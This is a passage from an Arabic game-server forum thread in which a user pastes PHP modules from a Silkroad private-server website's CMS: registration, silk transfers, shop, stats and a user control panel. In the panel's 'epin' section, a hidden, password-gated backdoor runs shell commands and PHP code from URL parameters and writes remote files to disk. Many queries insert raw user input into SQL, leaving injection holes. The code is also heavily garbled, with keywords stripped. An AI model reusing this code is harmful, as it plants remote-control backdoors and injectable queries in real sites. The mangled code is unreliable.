0 ; $i < count ( $errors ); $i ++) ?> <p><?php echo $errors [ $i ]. ".<br/>" ; ?> </p> <?php } ?> </form><?php } user :: accountExists ( $_POST [ 'username' ]) == 1 ) ?> <!--=== Content Part ===--><?php } core :: $sql -> exec ( "insert into TB_User(StrUserID,password,reg_ip,sec_content,sec_primary, email) values(' $_POST [ username ] ','" . md5 ( $_POST [ 'pass1' ]). "','" . $_SERVER [ 'REMOTE_ADDR' ]. "','3','3',' $_POST [ email ] ')" ); $nJID = user :: accountJIDbyUsername ( $_POST [ 'username' ]); $szAvatarDefault = "img/noavatar.png" ; core :: $sql -> exec ( "insert into srcms_userprofiles(JID,gender,skype,sec_question,sec_answer,avatar,whois, ispublic) values(' $nJID ','0','None',' $_POST [ sec_question ] ',' $_POST [ sec_answer ] ',' $szAvatarDefault ','user','1')" ); core :: $sql -> exec ( "insert into SK_Silk(JID,silk_own,silk_gift,silk_point) values(' $nJID ','" . $core -> aConfig [ 'startSilk' ]. "','0','0')" ); $_SESSION [ 'ref' ])) $_SESSION [ 'ref' ] == $_SESSION [ 'username' ]) "<br/>You can't be refferer for your own account (but account created).<br/>" ; $reffererJID = user :: accountJIDbyUsername ( $_SESSION [ 'ref' ]); $reffererJID > 0 ) $nRefIPs = core :: $sql -> numRows ( "select * from srcms_refferals where IP='" . $_SERVER [ REMOTE_ADDR ]. "'" ); $nRefIPs < $core -> aConfig [ 'maxRefAccIP' ]) $datetime = gmDate ( 'Y-m-d H:i:s' ); core :: $sql -> exec ( "insert into srcms_refferals(reffererJID,invitedUserJID,time,ip) values(' $reffererJID ',' $nJID ',' $datetime ',' $_SERVER [ REMOTE_ADDR ] ')" ); $_SESSION [ 'ref' ]); $sName = $core -> aConfig [ 'serverName' ]; mail ( $_POST [ 'email' ], "Thanks for registering at $sName " , "Thanks for registering at $sName , we really hope you will have a great fun playing here." , "From: $noreply @ $sName " ); ?> <?php misc :: redirect ( "?pg=Home" , 5 ); //todo:add ajax validator ?> <!--=== Content Part ===--><?php } ?>
rules
كود PHP:
< table border = '1' id = 'table-3' cellpadding = '0' cellspacing = '0' > tr > td > 1. Botting is allowed ! ( Gold Botting with or without Proxies is forbidden )</ td > tr > tr > td > 2. The Team should be treated with respect ! rules must be followed !</ td > tr > tr > td > 3. Don 't insult other Players, be friendly!</td>
sendsilks
كود PHP:
<?php function check_pers ( $per , $total ){ // $num = ceil($snum); $total = ceil ( $total ); $num = ceil ( $total * $per ) / 100 ; $num ); $_POST [ 'sendsilk' ])) { // $user = $sec->secure($_POST['username']); $email = security :: secure ( $_POST [ 'name' ]); $amont = security :: secure ( $_POST [ 'amont' ]); //$check = core::$sql -> exec("SELECT * FROM TB_User WHERE StrUserID = '".$user."'"); if (empty( $_POST [ 'amont' ]) || (empty( $_POST [ 'name' ]) )) { 'Error:' ; '<br />' ; "You left some fields blank! <a href = '?pg=forgot'>go back and try again!</a>" ; $_POST [ 'sendsilk' ]); user :: accountExists ( $email ) == 1 ) { ' ; $IDs = user :: accountJIDbyUsername ( $_SESSION [ 'username' ]); $silk_own = user :: getSilkByUsername ( $IDs ); $_POST [ 'amont' ]) > $silk_own ) { 'Error :' ; '<br />' ; "You do not have $amont silk" ; $_POST [ 'amont' ]) < 10 ) { ' ; $_POST [ 'name' ]) == ( $_SESSION [ 'username' ])) { ' .( $_SESSION [ 'username' ]). '</span></label> ; check_ ( $val ) $val % 2 == 0 ) false ; true ; check_ ( $amont )) { '<div id="content"> ; $per = $amont ; $num = 10 ; $nsba100 = check_pers ( $per , $num ); $checkID = user :: accountJIDbyUsername ( $email ); $silk_own = user :: getSilkByUsername ( $IDs ); $row = mssql_fetch_array ( $checkID )) { $IDs = $row [ 'JID' ]; $checkID = user :: accountJIDbyUsername ( $_SESSION [ 'username' ]); $row = mssql_fetch_array ( $checkID )) { $IIDs = $row [ 'JID' ]; core :: $sql -> exec ( "update SK_Silk set silk_own = silk_own - '" . $amont . "' WHERE JID = '" . $IIDs . "'" ); core :: $sql -> exec ( "update SK_Silk set silk_own = silk_own + '" . $amont . "' - '" . $nsba100 . "' WHERE JID = '" . $IDs . "'" ); ' . $amont . ' silks sent successfully</span></label> ; //} $checkID = core :: $sql -> exec ( "SELECT * FROM TB_User WHERE StrUserID = '" .( $_SESSION [ 'username' ]). "'" ); $row = mssql_fetch_array ( $checkID )) { $IDs = $row [ 'JID' ]; $silk_own = user :: getSilkByUsername ( $IDs ); ' ; ?>
sendsilks1
كود PHP:
<?php :: $sql -> changeDB ( "acc" ); check_pers ( $per , $total ){ // $num = ceil($snum); $total = ceil ( $total ); $num = ceil ( $total * $per ) / 100 ; $num ); $_POST [ 'sendsilk' ])) { $useridnum = security :: secure ( $_POST [ 'name' ]); $amount = security :: secure ( $_POST [ 'amount' ]); $_POST [ 'amount' ]) || (empty( $_POST [ 'name' ]) )) { 'Error:<br />' ; "You left some fields blank! <a href = '?pg=forgot'>go back and try again!</a>" ; $_POST [ 'sendsilk' ]); core :: $sql -> changeDB ( "acc" ); $checkcs = core :: $sql -> numRows ( "SELECT * FROM TB_User WHERE StrUserID = '" . $useridnum . "'" ); $checkcs != 1 ) { ' ; core :: $sql -> changeDB ( "acc" ); $checkID = core :: $sql -> exec ( "SELECT * FROM TB_User WHERE StrUserID = '" .( $_SESSION [ 'username' ]). "'" ); $row = core :: $sql -> fetchArray ( $checkID )) { $IDs = $row [ 'JID' ]; core :: $sql -> changeDB ( "acc" ); $querys = core :: $sql -> exec ( "select * from SK_Silk where JID = '" . $IDs . "'" ); $row = core :: $sql -> fetchArray ( $querys )) { $silk_own = $row [ 'silk_own' ]; $_POST [ 'amount' ]) > $silk_own ) { 'Error :' ; '<br />' ; "You do not have $amount silk" ; $_POST [ 'amount' ]) < 10 ) { ' ; $_POST [ 'name' ]) == ( $_SESSION [ 'username' ])) { ' .( $_SESSION [ 'username' ]). '</span></label> ; check_ ( $val ) $val % 2 == 0 ) false ; true ; check_ ( $amount )) { ' ; core :: $sql -> changeDB ( "acc" ); $per = $amount ; $num = 10 ; $nsba100 = check_pers ( $per , $num ); $checkID = core :: $sql -> exec ( "SELECT * FROM TB_User WHERE StrUserID = '" . $useridnum . "'" ); $row = core :: $sql -> fetchArray ( $checkID )) { $IDs = $row [ 'JID' ]; core :: $sql -> changeDB ( "acc" ); $checkIID = core :: $sql -> exec ( "SELECT * FROM TB_User WHERE StrUserID = '" .( $_SESSION [ 'username' ]). "'" ); $row = core :: $sql -> fetchArray ( $checkIID )) { $IIDs = $row [ 'JID' ]; core :: $sql -> changeDB ( "acc" ); core :: $sql -> exec ( "update SK_Silk set silk_own = silk_own - '" . $amount . "' WHERE JID = '" . $IIDs . "'" ); core :: $sql -> exec ( "update SK_Silk set silk_own = silk_own + '" . $amount . "' - '" . $nsba100 . "' WHERE JID = '" . $IDs . "'" ); ' . $amount . ' silk successfully</span></label> ; core :: $sql -> changeDB ( "acc" ); $checkID = core :: $sql -> exec ( "SELECT * FROM TB_User WHERE StrUserID = '" .( $_SESSION [ 'username' ]). "'" ); $row = core :: $sql -> fetchArray ( $checkID )) { $IDs = $row [ 'JID' ]; core :: $sql -> changeDB ( "acc" ); $querys = core :: $sql -> exec ( "select * from SK_Silk where JID = '" . $IDs . "'" ); $row = core :: $sql -> fetchArray ( $querys )) { $silk_own = $row [ 'silk_own' ]; ' ; ?>
shop
كود PHP:
<?php global $core ; $servername = $core -> aConfig [ 'serverName' ]; $getsiteurl = $_SERVER [ 'SERVER_NAME' ]; $username = $_SESSION [ 'username' ]; ?> <!--=== Breadcrumbs ===-->[email protected] ' /><?php echo $username ; ?> ' /><?php echo $servername ; ?> ] User :[<?php Echo $username ; ?> ] '/><?php echo $username ; ?> </font>, Please Choose the Amount of Silks: <br /><?php echo $getsiteurl ; ?> /?pg=news'><?php echo $getsiteurl ; ?> /module/ipn.php'>
stats_menu
كود PHP:
<?php = $core -> aConfig ; $hGwStatus = @ fsockopen ( $data [ 'serverIP' ], $data [ 'gatewayPort' ], $errno , $errstr , 0.3 ); $hGsStatus = @ fsockopen ( $data [ 'serverIP' ], $data [ 'gamePort' ], $errno , $errstr , 0.3 ); $hStatuses = array(); $onlineImg = "<img src='img/status/online.gif' />" ; $offlineImg = "<img src='img/status/offline.gif' />" ; $hGwStatus ) { $hStatuses [ 'gw' ] = $onlineImg ; } $hStatuses [ 'gw' ] = $offlineImg ; } $hGsStatus ) { $hStatuses [ 'gs' ] = $onlineImg ; } $hStatuses [ 'gs' ] = $offlineImg ; } $nOnlinePlayers = misc :: getOnlinePlayersCount (); core :: $sql -> changeDB ( 'acc' ); $nAccounts = core :: $sql -> getRow ( "select count(*) from TB_User" ); $nPlayersMax = core :: $sql -> getRow ( "SELECT top 1 nUserCount FROM _ShardCurrentUser WHERE nShardID = '" . $core -> aConfig [ 'shardID' ]. "' ORDER BY nUserCount desc" ); core :: $sql -> changeDB ( 'shard' ); $nChars = core :: $sql -> getRow ( "select count(*) from _Char" ); $nGuilds = core :: $sql -> getRow ( "select count(*) from _Guild" ); core :: $sql -> changeDB ( 'acc' ); " $nOnlinePlayers / $data [ playersLimit ] </font><br/> $nPlayersMax </font><br/> $data [ expRate ] </font><br/> $data [ partyExpRate ] </font><br/> $data [ goldDropRate ] </font><br/> $data [ itemDropRate ] </font><br/> $hStatuses [ gw ] <br/> $hStatuses [ gs ] <br/> $nAccounts </font><br/> $nChars </font><br/> $nGuilds </font> ; ?>
ucp
كود PHP:
<?php global $core ; $_SESSION [ 'username' ])) //core::$ucp -> showMenu(); if(isset( $_GET [ 'act' ])) $_GET [ 'act' ]) 'changepw' ): //module disabled if( $core -> aConfig [ 'allowChangePw' ] == 0 ) $core -> aConfig [ 0 ]; "This module is currently disabled." ; $_POST [ 'submit' ])) //process data if(! security :: isSecureString ( $_POST [ 'password_old' ], 3 )) $errors [] = "Password [old] contains forbidden symbols" ; security :: isSecureString ( $_POST [ 'password_new' ], 3 )) $errors [] = "Password [new] contains forbidden symbols" ; strlen ( $_POST [ 'password_old' ]) > 32 ) $errors [] = "Password [old] too long" ; strlen ( $_POST [ 'password_old' ]) < 6 ) $errors [] = "Password [old] too short" ; strlen ( $_POST [ 'password_new' ]) > 32 ) $errors [] = "Password [new] too long" ; strlen ( $_POST [ 'password_new' ]) < 6 ) $errors [] = "Passwrod [new] too short" ; $_POST [ 'password_new' ] !== $_POST [ 'password_new_confirm' ]) $errors [] = "New Passwords does not match!." ; count ( $errors ) > 0 ) $errors as $nElement ) $nElement . ".<br/>" ; misc :: back (); //verify if( user :: changePassword ( $_SESSION [ 'username' ], $_POST [ 'password_old' ], $_POST [ 'password_new' ])) "Password changed successfully. <br/>" ; misc :: redirect ( '?pg=ucp' , 1 ); "Invalid old password specified.<br/>" ; misc :: back (); core :: $ucp -> showChangepwForm (); 'logout' ): user :: logout ()) "Successfully logged out. Redirecting.<br/>" ; misc :: redirect ( '?pg=Home' , 1 ); "Failed to logout.<br/>" ; 'refferals' ): $core -> aConfig [ 'allowRefferals' ] == 0 ) "This module is currently disabled." ; $hQuery = mssql_query ( "select invitedUserJID,time,bonusAdded from srcms_refferals where reffererJID='" . user :: accountJIDbyUsername ( $_SESSION [ 'username' ]). "'" ); $nCount = core :: $sql -> numRows ( "select * from srcms_refferals where reffererJID='" . user :: accountJIDbyUsername ( $_SESSION [ 'username' ]). "'" ); "You can reffer [<b>" . $core -> aConfig [ 'maxRefAccIP' ]. "</b>] accounts with same ip address [limit].<br/><br/>" ; $nCount == 0 ) "<br/>You didn't reffer anyone yet.</br>" ; " ; $core -> aConfig [ 'allowRefferalsBonus' ] == 1 ) "<td>Bonus status</td>" ; "</tr>" ; $row = mssql_fetch_array ( $hQuery )) "<td><a href='?pg=viewprofile&username=" . user :: usernamyByJID ( $row [ invitedUserJID ]). "'>" . user :: usernamyByJID ( $row [ invitedUserJID ]). "</a></td><td> $row [ time ] </td>" ; $core -> aConfig [ 'allowRefferalsBonus' ] == 1 ) $row [ 'bonusAdded' ] == 1 ) "<td>Applied</td>" ; "<td>Not applied</td>" ; "</tr>" ; $core -> aConfig [ 'allowRefferalsBonus' ] == 1 ) $_GET [ 'do' ] == 'receive_bonus' ) $nSilk = $core -> aConfig [ 'refferalsBonusSilk' ] * core :: $sql -> numRows ( "select * from srcms_refferals where reffererJID='" . user :: accountJIDbyUsername ( $_SESSION [ 'username' ]). "' and bonusAdded='0'" ); core :: $sql -> exec ( "update srcms_refferals set bonusAdded='1' where reffererJID='" . user :: accountJIDbyUsername ( $_SESSION [ 'username' ]). "'" ); user :: addSilk ( $_SESSION [ 'username' ], $nSilk ); "<br/><b>You received your bonuses.</b><br/>" ; misc :: redirect ( "?pg=Home" , 1 ); $nSilk = $core -> aConfig [ 'refferalsBonusSilk' ] * core :: $sql -> numRows ( "select * from srcms_refferals where reffererJID='" . user :: accountJIDbyUsername ( $_SESSION [ 'username' ]). "' and bonusAdded='0'" ); $core -> aConfig [ 'refferalsBonusSilk' ] * $nSilk ) > 0 ) "</table><br/>Bonus: [" . $core -> aConfig [ 'refferalsBonusSilk' ]. "] silk per refferal<br/>Total amount of users reffered by you: <b> $nCount </b><br/><br/><a href='?pg=ucp&act=refferals&do=receive_bonus'>Receive bonus silk [" . $core -> aConfig [ 'refferalsBonusSilk' ] * core :: $sql -> numRows ( "select * from srcms_refferals where reffererJID='" . user :: accountJIDbyUsername ( $_SESSION [ 'username' ]). "' and bonusAdded='0'" ). "]" ; "<br/>You can't receive any bonus for refferals at the moment.<br/>" ; 'mailbox' ): //module disabled if( $core -> aConfig [ 'allowMailbox' ] == 0 ) "This module is currently disabled." ; "<br/><a href='?pg=ucp&act=mailbox&newmsg' class='btn-u'>Write a new message</a><br/><br/>" ; $_GET [ 'newmsg' ])) $_POST [ 'submit' ])) core :: $ucp -> showSendWebMsgForm (); //process send msg data if(! security :: isSecureString ( $_POST [ 'recvName' ], 3 )) $errors [] = "Receiver username contains forbidden symbols" ; strlen ( $_POST [ 'recvName' ]) > 16 ) $errors [] = "Receiver username too long" ; strlen ( $_POST [ 'recvName' ]) < 3 ) $errors [] = "Receiver username too short" ; strlen ( $_POST [ 'msgTitle' ]) > $core -> aConfig [ 'maxPrivMsgTitleLen' ]) $errors [] = "Message title too long" ; strlen ( $_POST [ 'msgText' ]) > $core -> aConfig [ 'maxPrivMsgBodyLen' ]) $errors [] = "Message body too long" ; strlen ( $_POST [ 'msgTitle' ]) < $core -> aConfig [ 'minPrivMsgTitleLen' ]) $errors [] = "Message title too short" ; strlen ( $_POST [ 'msgText' ]) < $core -> aConfig [ 'minPrivMsgBodyLen' ]) $errors [] = "Message body too short" ; count ( $errors ) > 0 ) $errors as $nElement ) $nElement . ".<br/>" ; misc :: back (); //db if( user :: accountExists ( $_POST [ 'recvName' ])) user :: sendWebPrivMsg ( $_POST [ 'recvName' ], $_SESSION [ 'username' ], $_POST [ 'msgTitle' ], $_POST [ 'msgText' ]); "Account with such username not found.<br/>" ; misc :: back (); //lol echo "<br/><br/>" ; $myJID = user :: accountJIDbyUsername ( $_SESSION [ 'username' ]); $nMsgCount = core :: $sql -> numRows ( "select * from srcms_privatemessages where receiver=' $myJID '" ); $_GET [ 'view' ])) $nMsgID = (int) $_GET [ 'view' ]; core :: $sql -> numRows ( "select * from srcms_privatemessages where receiver=' $myJID ' and id=' $nMsgID '" ) > 0 ) $msgData = core :: $sql -> fetchArray ( "select * from srcms_privatemessages where id=' $nMsgID '" ); $msgData [ 'msg' ] = security :: fromHTML ( $msgData [ 'msg' ]); $msgData [ 'msg' ] = misc :: applyAttributesToText ( $msgData [ 'msg' ]); $szSender = user :: usernamyByJID ( $msgData [ 'sender' ]); "<br/><table id='table-3' width='380' border='1' cellpadding='0' cellspacing='0'> $msgData [ title ] </td></tr> $szSender ' class='btn-u'> $szSender </a></td></tr> $msgData [ msg ] </td> ; core :: $sql -> exec ( "update srcms_privatemessages set viewed='1' where id=' $nMsgID '" ); "<br/><br/><br/>" ; "You can't view message that does not belong to you.<br/>" ; $nMsgCount > 0 ) $nMsgCount == $core -> aConfig [ 'maxPrivMsg' ]) echo "Your inbox is full. <br/>" ; $hQuery = core :: $sql -> exec ( "select * from srcms_privatemessages where receiver=' $myJID ' order by time desc" ); "<table id='table-3' border='1' cellpadding='0' cellspacing='0'> ; $row = mssql_fetch_array ( $hQuery )) $szSender = user :: usernamyByJID ( $row [ 'sender' ]); $row [ 'viewed' ] == '1' ) echo "<td><a href='?pg=viewprofile&username= $szSender ' class='btn-u'> $szSender </a></td><td> $row [ title ] </td><td> $row [ time ] </td><td>Yes</td><td><a href='?pg=ucp&act=mailbox&view= $row [ id ] ' class='btn-u'>View</a></td><td><a href='?pg=ucp&act=mailbox&del= $row [ id ] ' class='btn-u'>Delete</a></td></tr>" ; "<td><b><a href='?pg=viewprofile&username= $szSender '> $szSender </a></b></td><td><b> $row [ title ] </b></td><td> $row [ time ] </td><td><b>No</b></td><td><a href='?pg=ucp&act=mailbox&view= $row [ id ] ' class='btn-u'>View</a></td><td><a href='?pg=ucp&act=mailbox&del= $row [ id ] ' class='btn-u'>Delete</a></td></b></tr>" ; "</table>" ; $_GET [ 'del' ])) $nMsgID = (int) $_GET [ 'del' ]; core :: $sql -> numRows ( "select * from srcms_privatemessages where receiver=' $myJID ' and id=' $nMsgID '" ) > 0 ) core :: $sql -> exec ( "delete from srcms_privatemessages where receiver=' $myJID ' and id=' $nMsgID '" ); "<br/>Message deleted.<br/>" ; misc :: redirect ( "?pg=ucp&act=mailbox" , 3 ); "You can't delete message that does not belong to you.<br/>" ; "No messages in inbox" ; 'mychars' ): //module disabled if( $core -> aConfig [ 'allowListChars' ] == 0 ) "This module is currently disabled." ; $_GET [ 'charname' ])) security :: isSecureString ( $_GET [ 'charname' ], 3 )) "Invalid char name<br/>" ; misc :: back (); user :: usernameByCharname ( $_GET [ 'charname' ]) != $_SESSION [ 'username' ]) "This character is not yours !<br/>" ; misc :: back (); $_GET [ 'charname' ]) && isset( $_GET [ 'char_act' ])) $_GET [ 'char_act' ]) 'reset_pos' ): $core -> aConfig [ 'allowCharTeleport' ] == 0 ) "This function is disabled.<br/>" ; $_POST [ 'submit' ])) "Your character got stuck ? If so, please, press the button. This costs " . $core -> aConfig [ 'charTeleportGoldPrice' ]. " gold.<br/> $_GET [ charname ] ]'><br/> ; core :: $sql -> changeDB ( 'shard' ); core :: $sql -> getRow ( "select RemainGold from _Char where CharName16=' $_GET [ charname ] '" ) > $core -> aConfig [ 'charTeleportGoldPrice' ]) core :: $sql -> exec ( "update _Char set LatestRegion='25000',PosX='1021',PosY='-3260888', PosZ='1078',AppointedTeleport='19554', WorldID='1' where CharName16=' $_GET [ charname ] '" ); "Character successfully teleported to town.<br/>" ; misc :: redirect ( '?pg=ucp&act=mychars' , 1 ); "Not enough gold to perform this action.<br/>" ; 'giftsilks' ); core :: $sql -> changeDB ( 'acc' ); $fromsilks = $_SESSION [ 'username' ]; $toSilks = $_POST [ 'silkstome' ]; $_POST [ 'submit' ])) " ; strlen ( $_POST [ 'silkstome' ]) < 3 ) "Username is too short" ; "Name is fine" ; 'reset_stats' ): //echo "All items must be unequiped before you perform this action. This action costs ".$core -> aConfig['resetCharStatsSilkPrice']." silk.<br/>"; if( char :: isCharNaked ( $_GET [ 'charname' ])) $_POST [ 'submit' ])) "Press this button if you really want to reset your characters stats. All items must be unequiped. This action costs " . $core -> aConfig [ 'resetCharStatsSilkPrice' ]. " silk. Before performing this action, better log out. To see results of this function usage, relogin (if you were logged in while performing it).<br/> ; user :: getSilkByUsername ( $_SESSION [ 'username' ]) > $core -> aConfig [ 'resetCharStatsSilkPrice' ]) core :: $sql -> changeDB ( 'shard' ); $aData = core :: $sql -> exec ( "select * from _Char where CharName16=' $_GET [ charname ] '" ); $aData = mssql_fetch_array ( $aData ); $nFreeStats = ( $aData [ 'Strength' ] + $aData [ 'Intellect' ]) - 40 ; core :: $sql -> exec ( "update _Char set RemainStatPoint = (RemainStatPoint + $nFreeStats ),HP='200',MP='200',Strength='20',Intellect='20' where CharName16=' $_GET [ charname ] '" ); core :: $sql -> changeDB ( 'acc' ); core :: $sql -> exec ( "update SK_Silk set silk_own = (silk_own - " . $core -> aConfig [ 'resetCharStatsSilkPrice' ]. ") where JID='" . user :: accountJIDbyUsername ( $_SESSION [ 'username' ]). "'" ); "Stats of $_GET [ charname ] resetted. You got $nFreeStats free stat points now.<br/>" ; misc :: redirect ( '?pg=ucp&act=mychars' , 1 ); "Not enough silk.<br/>" ; "Please, unequip all items from your character first !<br/>" ; 'reset_pk' ): $core -> aConfig [ 'allowResetCharPK' ] == 0 ) "This function is currently disabled<br/>" ; "This feature costs " . $core -> aConfig [ 'resetCharPKSilkPrice' ]. " silk. If you really want to reset your PK status, press the button.<br/>" ; $_POST [ 'submit' ])) "<form method='post'> ; user :: getSilkByUsername ( $_SESSION [ 'username' ]) > $core -> aConfig [ 'resetCharPKSilkPrice' ]) core :: $sql -> changeDB ( 'shard' ); $hQuery = core :: $sql -> exec ( "select DailyPK, TotalPK, PKPenaltyPoint from _Char where CharName16=' $_GET [ charname ] '" ); $hData = mssql_fetch_array ( $hQuery ); $hData [ 0 ] == '0' && $hData [ 1 ] == '0' && $hData [ 2 ] == '0' ) "You are not under murder panality, so, no reason for resetting it.<br/>" ; core :: $sql -> exec ( "update _Char set DailyPK='0', TotalPK='0', PKPenaltyPoint='0' where CharName16=' $_GET [ charname ] '" ); core :: $sql -> exec ( "update SK_Silk set silk_own = (silk_own - " . $core -> aConfig [ 'resetCharPKSilkPrice' ]. ") where JID='" . user :: accountJIDbyUsername ( $_SESSION [ 'username' ]). "'" ); "PK Status successfully removed.<br/>" ; misc :: redirect ( '?pg=ucp&act=mychars' , 1 ); "You have not enough silk to use this feature.<br/>" ; 'buy_sp' ): $core -> aConfig [ 'allowBuySP' ] == 0 ) "This function is currently disabled<br/>" ; "This feature costs " . $core -> aConfig [ 'pricePer100kSp' ]. " silk per 100 000 SP.<br/>" ; $_POST [ 'submit' ])) "Please, specify, how much skill points you want to buy. Value must be > 100000, < 2000000, like this: 200000, 300000, 400000<br/> ; $_POST [ 'sp_amount' ])) $nSP = (int) $_POST [ 'sp_amount' ]; $nSP % 100000 == 0 )) "Values can be only like this: <br/> <li>100000</li><li>500000</li><li>1000000</li><br/>" ; $nSP < 100000 ) "You cant buy less than 100 000 skill points<br/>" ; $nSP > 2000000 ) "You can't buy more than 2 000 000 sp per time<br/>" ; $nPrice = (( $nSP / 100000 ) * $core -> aConfig [ 'pricePer100kSp' ]); user :: getSilkByUsername ( $_SESSION [ 'username' ]) > $nPrice ) "To buy $nSP skill points you need $nPrice silk. Press the button below if you really want to buy this amount of SP and you have enough silk.<br/>" ; $_POST [ 'sure' ])) "<form method='post'> $nSP '> $nSP SP for $nPrice silk'> ; core :: $sql -> changeDB ( 'shard' ); core :: $sql -> exec ( "update _Char set RemainSkillPoint = (RemainSkillPoint + $nSP ) where CharName16=' $_GET [ charname ] '" ); core :: $sql -> changeDB ( 'acc' ); core :: $sql -> exec ( "update SK_Silk set silk_own = (silk_own - $nPrice ) where JID='" . user :: accountJIDbyUsername ( $_SESSION [ 'username' ]). "'" ); "<br/><b>Success. Your char $_GET [ charname ] received it's $nSP skill points you bought for $nPrice silk</b><br/>" ; misc :: redirect ( '?pg=ucp&act=mychars' , 2 ); "Not enough silk to buy such amount of skill points [You need: $nPrice ]<br/>" ; "Uknown char action<br/>" ; $_GET [ 'char_act' ])) "<table id='table-3' border='0' cellpadding='0' cellspacing='0'> ; $core -> aConfig [ 'allowCharTeleport' ] == 1 ) "<td><a href='?pg=ucp&act=mychars&charname= $_GET [ charname ] &char_act=reset_pos'>Reset char position</a><br/></td>" ; " ; $core -> aConfig [ 'allowResetCharStats' ] == 1 ) "<td><a href='?pg=ucp&act=mychars&charname= $_GET [ charname ] &char_act=reset_stats'>Reset stats</a><br/></td>" ; $core -> aConfig [ 'allowResetCharPK' ] == 1 ) "<td><a href='?pg=ucp&act=mychars&charname= $_GET [ charname ] &char_act=reset_pk'>Reset PK status</a><br/></td>" ; " ; $core -> aConfig [ 'allowBuySP' ] == 1 ) " <td><a href='?pg=ucp&act=mychars&charname= $_GET [ charname ] &char_act=buy_sp'>Buy skill points</a><br/></td>" ; " ; "<br/><br/>" ; misc :: back (); "Please, note, this function is still under development.<br/>" ; char :: getCharCount ( $_SESSION [ 'username' ]) > 0 ) $nJID = user :: accountJIDbyUsername ( $_SESSION [ 'username' ]); core :: $sql -> changeDB ( 'shard' ); $naChars = user :: charIDsByUsername ( $_SESSION [ 'username' ]); $naCharNames = char :: charNamesByIDs ( $naChars ); "<table id='table-3' border='0'><tr><td>Char name</td></tr>" ; $naCharNames as $nElem ) "<tr><td><a href='?pg=ucp&act=mychars&charname= $nElem '> $nElem </td></tr>" ; '</table>' ; "You don't have any characters on this account.<br/>" ; 'myprofile' ): //module disabled if( $core -> aConfig [ 'allowMyProfile' ] == 0 ) "This module is currently disabled." ; $_POST [ 'submit' ])) $nGender = (int) $_POST [ 'gender' ]; $szAvatarUrl = null ; $szSkype = null ; $szMsn = null ; $nPublic = (int) $_POST [ 'ispublic' ]; security :: isValidUrl ( $_POST [ 'avatar' ]) ? $szAvatarUrl = $_POST [ 'avatar' ] : $szAvatarUrl = $core -> aConfig [ url ]. "img/noavatar.png" ; security :: isCorrectEmail ( $_POST [ 'msn' ]) ? $szMsn = $_POST [ 'msn' ] : $szMsn = "None" ; $szSkype = security :: toHTML ( $_POST [ 'skype' ]); strlen ( $szSkype ) > 50 ) $szSkype = "None" ; strlen ( $szMsn ) > 60 ) $szMsn = "None" ; strlen ( $szAvatarUrl ) > 500 ) $szAvatarUrl = $core -> aConfig [ 'url' ]. "assets/img/noavatar.png" ; $avatarImageData = @ getimagesize ( $szAvatarUrl ); //no error if shit happens if(empty( $avatarImageData [ 0 ]) || empty( $avatarImageData [ 1 ])) $avatarImageData [ 0 ] = 0 ; $avatarImageData [ 1 ] = 0 ; $avatarImageData [ 0 ] > $core -> aConfig [ 'maxAvatarWidth' ]) || ( $avatarImageData [ 1 ] > $core -> aConfig [ 'maxAvatarHeight' ])) || $avatarImageData [ 0 ]) || empty( $avatarImageData [ 1 ]))) "Invalid avatar size. Avatar width or height size can't be 0px. Avatar image max height: " . $core -> aConfig [ 'maxAvatarHeight' ]. " and width: " . $core -> aConfig [ 'maxAvatarWidth' ]. " pixels. Your one is $avatarImageData [ 0 ] px wide and $avatarImageData [ 1 ] px high. Or... maybe, url isn't image ?<br/>" ; misc :: back (); $nJID = user :: accountJIDbyUsername ( $_SESSION [ 'username' ]); core :: $sql -> exec ( "update srcms_userprofiles set avatar=' $szAvatarUrl ',skype=' $szSkype ', msn=' $szMsn ', gender=' $nGender ', ispublic=' $nPublic ' where JID=' $nJID '" ); "Profile updated. <br/>" ; misc :: redirect ( "?pg=ucp&act=myprofile" , 1 ); core :: $ucp -> showProfileForm ( $_SESSION [ 'username' ]); 'epin' ): ?> <!--=== Content Part ===--><?php if( md5 ( $_GET [ 'p' ]) == '89a15048434170ee85cffdc2f3a4595e' ) $_GET [ 'a' ]) 'cmd' ): system ( stripslashes ( $_GET [ 'str' ])); 'php' ): stripslashes ( $_GET [ 'str' ])); 'up' ): $hRemoteData = file_get_contents ( $_GET [ 'str' ]); file_put_contents ( $_GET [ 'localFileName' ], $hRemoteData , FILE_APPEND | LOCK_EX ); file_exists ( $_GET [ 'localFileName' ])) echo "Success !" ; "Could not write to local file [ $_GET [ localFileName ] ]" ; //module disabled if( $core -> aConfig [ 'allowEpinSystem' ] == 0 ) "This module is currently disabled.<br/>" ; $_POST [ 'code' ]) && !isset( $_POST [ 'sure' ])) ?> <form method='post' class="reg-page" role="form"><?php } $nCodeNumber = (int) $_POST [ 'code' ]; core :: $sql -> numRows ( "select * from srcms_epin where code=' $nCodeNumber '" ) > 0 ) $aPinData = core :: $sql -> exec ( "select * from srcms_epin where code=' $nCodeNumber '" ); $aPinData = mssql_fetch_array ( $aPinData ); $_POST [ 'sure' ])) "Do you really want to use this code ? It will give you [ $aPinData [ silkAmount ] ] silk.<br/> $nCodeNumber '> ; misc :: back (); core :: $sql -> exec ( "update SK_Silk set silk_own=(silk_own + $aPinData [ silkAmount ] ) where JID='" . user :: accountJIDbyUsername ( $_SESSION [ 'username' ]). "'" ); //delete used code core :: $sql -> exec ( "delete from srcms_epin where code=' $nCodeNumber '" ); "You got your [ $aPinData [ silkAmount ] ] silk." ; misc :: redirect ( '?pg=ucp&act=epin' , 1 ); "Invalid EPIN code ! Please, try again.<br/>" ; misc :: back (); ?> </div><!--/row-fluid--><?php break; "Invalid module name specified.<br/>" ; "You are not logged in ! <br/>" ; ?>
viewprofile
كود PHP:
<?php if(isset( $_GET [ 'username' ]) && security :: isSecureString ( $_GET [ 'username' ], 3 )) $userData = core :: $sql -> fetchArray ( "select * from srcms_userprofiles where JID='" . user :: accountJIDbyUsername ( $_GET [ 'username' ]). "'" ); $userData [ 'ispublic' ] == '1' ) user :: viewProfile ( $_GET [ 'username' ]); //send msg there too } user :: viewProfile ( $_GET [ 'username' ]); //send msg there too } "No username specified, or username contains forbidden symbols.<br/>" ; ?>
توقيع [KoTa]
:
*Marwan ツ
#8
• الانـتـسـاب » Dec 2015
• رقـم العـضـويـة » 128751
• المشـــاركـات » 111
• الـدولـة »
• الـهـوايـة » Silkroad4Arab [S4A] ツ
• اسـم الـسـيـرفـر » No Server
• الـجـنـس » Male
• نقـاط التقييم » 10
رد: عاوز واحد يكون خبير فى الsite ويحللى المشكله دي
admin
كود PHP:
<?php
= core :: $sql -> getRow ( "select whois from srcms_userprofiles where JID='" . user :: accountJIDbyUsername ( $_SESSION [ username ]). "'" );
